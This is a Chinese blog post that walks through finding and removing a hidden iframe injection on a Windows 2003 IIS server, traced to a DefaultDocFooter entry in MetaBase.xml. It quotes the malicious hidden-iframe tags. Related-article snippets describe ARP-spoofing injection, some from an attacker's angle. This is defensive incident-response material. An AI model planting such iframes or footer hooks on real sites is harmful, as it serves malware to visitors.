处理WIN2003服务器IIS被挂马全过程(配置文件高级挂马)

最新推荐文章于 2022-04-08 11:50:10 发布
原创 最新推荐文章于 2022-04-08 11:50:10 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#iis #服务器 #代码分析 #iframe #html #杀毒软件

本文详细记录了一台Win2003服务器遭遇IIS挂马问题的处理过程。从最初怀疑的ARP挂马到发现IIS配置文件中的问题,最终通过Filemon定位到C:/Inetpub/wwwroot/iisstart.htm文件,并删除相关挂马代码解决问题。通过对MetaBase.xml的修改,成功防止了通过DefaultDocFooter挂马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

By  wuchaochao

一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
分析原因
首先怀疑ARP挂马,用防ARP的工具又没有发现有arp欺骗
而且arp欺骗一般不会每次都被插入代码,而是时有时无
而且使用http://127.0.0.1 或者http://localhost 访问的时候也可以找到这段代码
arp欺骗的可能排除。
然后就想到可能是JS被篡改,或者是其它的包含文件,查找后没有发现被改的页面 连新建的HTML页面浏览的时候也会被插入这段代码,那就只能是通过IIS挂上去的了。
备份iis数据然后重装iis,代码消失,将备份的iis恢复,问题又来了。
仔细寻找,问题应该出在IIS的配置文件上,打开配置文件,没有发现那段代码。
那很有可能是调用了某个文件,这个怎么查啊,忽然想起了大名鼎鼎的Filemon
本地载了一个上传到服务器上,打开Filemon,数据太多了,过滤掉一些没有用的
只留下iis的进程,数据还是很多,看来服务器上的站点还是挺多人在访问的。
关掉所有站点,建了一个测试站点anky 目录为D:/www/ 在下面建了一个空白页面test.htm
访问一下这个页面代码被插进来了,再看一下Filemon 奇怪怎么读取C:/Inetpub/wwwroot/iisstart.htm
打开C:/Inetpub/wwwroot/iisstart.htm一看,里面就躺着
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
把代码删除了留空,访问test.htm 正常了,把C:/Inetpub/wwwroot/iisstart.htm删除了再访问
test.htm 出现 “读取数据页脚文件出错”问题就出这里了,看来是调用了
这个文件。
把C:/Inetpub/wwwroot/iisstart.htm清空就正常了,这样怎么行,解决问题当然要连根拔掉。
continue
有没有可能是扩展造成的,到扩展中检查了一遍全部都是正常的
当然 通过ISAPI 挂马的也是存在的
左想右想最后还是觉得配置文件有问题
打开配置文件,配置文件在%windir%/system32/inetsrv/MetaBase.xml
用记事本打开,查找iisstart.htm 找到一行,开始以为是默认站点,后来一想不对啊
默认站点都删除了,再仔细一看这句代码为
DefaultDocFooter="file:C:/Inetpub/wwwroot/iisstart.htm"
删除掉这一行,问题彻底解决了。

arp挂马方案
swdkk的专栏
12-07 908
 不管是访问服务器上的任何网页,就连404的页面也会在后加入:;,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况.首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是 title的地
ARP欺骗挂马的教程
11-02
ARP欺骗挂马的教程
服务器挂马清理实例
wwwwestcn的博客
04-08 570
网站通过百度搜索访问,会跳转到异常网站。 经过仔细分析、核实,确定是被挂马造成,但网页源文件中、使用安全工具扫描都没有发现异常代码。 新建空文件1.html,使用工具测试也显示挂马,说明是系统层面问题。 经查看站点设置等信息,发现iis站点》模块被加入了异常dll,如图 根据经验,%windir%开头的路径是系统自动加的,理论上没有问题;如果是c:\windows要重点核实。 经过分析,此文件是木马病毒文件。 删除模块加载,并删除文件,重启iis后测试,挂马消失。
杀毒:2003服务器 查IIS 挂马全过程
09-08 1260
在google上搜索iis iframe得到以下解决办法: 一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了 http://xxxdfsfd/web.htm" height=0 width=0> 这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒 打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码 分析原因首先怀疑ARP挂马,用防AR
2003服务器IIS 挂马全过程(ARP挂马)
weixin_34204722的博客
04-24 168
2003服务器 查IIS 挂马全过程一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了 《iframe src="http://xxxdfsfd/web.htm" height=0 width=0&gt; 这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒 打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码 分析原因首先怀疑ARP挂马,用防ARP的工具又没有发现有...
网站被挂马,谨防IIS模块挂马
我是来搞笑的小白
09-12 2469
今天遇到一个很奇怪的挂马问题,查关键词,查数据库等常规方法都没有找到原因,debug断点都放在了程序执行代码最前面还是输出挂马内容,用php探针发现也有代码,所以确认了是iis全局的问题,所以查加载查组件,最终经过比对是iis被黑添加了模块,被添加的名称很具有迷惑性,通常伪装的很像系统模块,遇到查不到是什么地方挂马,可以放一个探针来判断下是不是iis问题。 » 转载请保留出处:豫章小站...
zxARPs局域网ARP欺骗挂马方式详细讲解(图文)
weixin_34143774的博客
04-19 933
  一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。 局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中...
Win2003服务器iis60环境下php532安装配置教程图解(1).docx
最新发布
07-20
IIS管理器中,为特定网站设置主目录,并在配置中添加PHP的应用程序映射,确保PHP文件请求能被正确处理。 最后,测试配置是否成功。可以创建一个简单的PHP测试文件,例如使用phpinfo()函数来显示PHP的配置信息,...
Win2003服务器 IIS6.0 rewrite的设置图文教程
10-01
### Win2003服务器 IIS6.0 rewrite的设置图文教程 #### 一、前言 在Web开发中,URL重写(URL Rewrite)是一种非常实用的技术,它可以帮助我们优化网站结构,提升用户体验,同时也有利于搜索引擎优化(SEO)。对于...
win2003文件服务器蓝屏修复全过程分享第1/2页
01-10
由于服务器比较老旧,造成RAID驱动获取困难,且需要软盘进行驱动加载,整个处理过程相对复杂,在此分享处理全过程,希望能够帮助后面遇到相同问题的朋友; 起因: 昨日上午同时在进行服务器检测时发现文件服务器的...
WIN2003服务器 IIS经常停止响应问题解决办法参考
01-11
下面是出问题的一些人的服务器的现象 1、服务器 window2000 adv server cpu 4G 内存2G 我公司负责维护的asp程序经常停止响应,具体现象是服务器有一个dllhost进程占用内存较大杀掉该进程后恢复正常。以前也出现过...
win2003 服务器安全配置全套详解
09-30
总结来说,Win2003服务器的安全配置是一个复杂但至关重要的过程。通过上述的设置方法,可以大幅提高服务器的安全性,防止恶意攻击和漏洞利用。同时,维护者应关注最新的安全动态,及时更新服务器软件和安全补丁,以...
IIS挂马了,如何处理
liwendong528的专栏
08-01 2308
什么现象是IIS挂马? (前提)网站程序没有发现被挂马的文件, 但是访问网站的时候,页面会突然跳转到到别的网站去 网站会出现莫名奇妙的链接,图片,页面等。 网站域名经常会有错误的,甚至是莫名奇妙的地址访问(有的时候是扫漏洞,但是次数多了,就是被挂马,域名被反利用了) IIS的重要文件夹 C:\inetpub\ : IIS文件的操作历史,日志,默认文件 C:\inetpub\history: IIS配置文件更改历史记录 C:\Windows\System32\inetsrv...
ARP挂马***--嗅探欺骗的最恐怖方式
weixin_34235457的博客
01-09 210
ARP挂马***--嗅探欺骗的最恐怖方式 局域网内"交换型"网络环境中的嗅探***,利用的是ARP欺骗的原理,它是点对点地发生在3台主机(网关、欺骗主机与被欺骗主机)之间的。 然而在2007年初,以ARPSpoof工具为代表的新兴ARP欺骗技术发生了变化,直接针对网关进行欺骗,让通过网关访问网络的所有主机全被欺骗***,以造成网站被***的假象,或者直接访问到***网页。...
网络安全---------arp挂马攻击
Mr_Effiya的博客
11-20 873
原理:arp中间人攻击,实际上相当于做了一次代理。  正常时候: A----&gt;B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机  arp中间人攻击时候: A----&gt;C----&gt;B  B----&gt;C----&gt;A  实际上,C在这里做了一次代理的作用  那 么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时...
新的挂马方式ARP欺骗挂马称雄局域网
积木网络
10-23 906
 网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。  局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电
Arp挂马原理技术剖析
weixin_33904756的博客
08-26 149
原文来自:http://bbs.51cto.com/thread-600391-1.html不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入: <IFRAMESRC=http://cool.47555.com/k.htmwidth=1height=1frameborder=0></IFRAME>;,挂马的位置...
iis 服务器挂马 asp文件夹名称后带空格,做了安全配置的IIS服务器仍被挂马问题探讨...
weixin_36127579的博客
08-03 284
最新,笔者单位有台服务器,全服务器所有网站都被挂马(前提是笔者已经做了FSO安全配置,每个网站都设定单独访问用户),不仅是ASP文件被挂马,甚至有些HTML文件也被挂马,查看源代码中却找不到挂马的代码。被挂马的网站头部都显示如下形式的代码:起初怀疑是JS代码搞鬼,查看服务器上所有JS文件,找了半天也没发现。于是我就新建一个HTML文件,然后浏览,依然有上面形式的代码(我晕~~~怀疑自己机子中木马,...
强制在VISTA,WIN7,XP当中安装SQL server 2000服务器等版本
qqcxw
08-30 3894
<br />  一、找一张SQL server服务器版光盘,在光盘上找到目录“MSDE”并进入,运行SETUP.EXE文件,并按照程序要求进行安装。安装完成重新启动计算机。<br />  二、运行光盘中的,AUTORUN.EXE文件,或让光盘自动运行,打开安装界面后,点击“安装SQL server 2000组件(C)”=》“安装数据库服务器(S)”这里程序将提示你“....服务器组件在此系统上不受支持,.....”点“确定”。进入新的安装界面,点击“下一步”,选择默认的“本地计算机”=》“创建新的SQL s
阿里云Win2003服务器IIS+FTP安装与配置详解
阿里云云服务器Windows 2003系统中安装和使用FTP教程详细介绍了如何在该环境中通过Windows IIS(Internet Information Services)来配置和运行FTP(File Transfer Protocol)服务。以下步骤是整个过程的关键部分: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值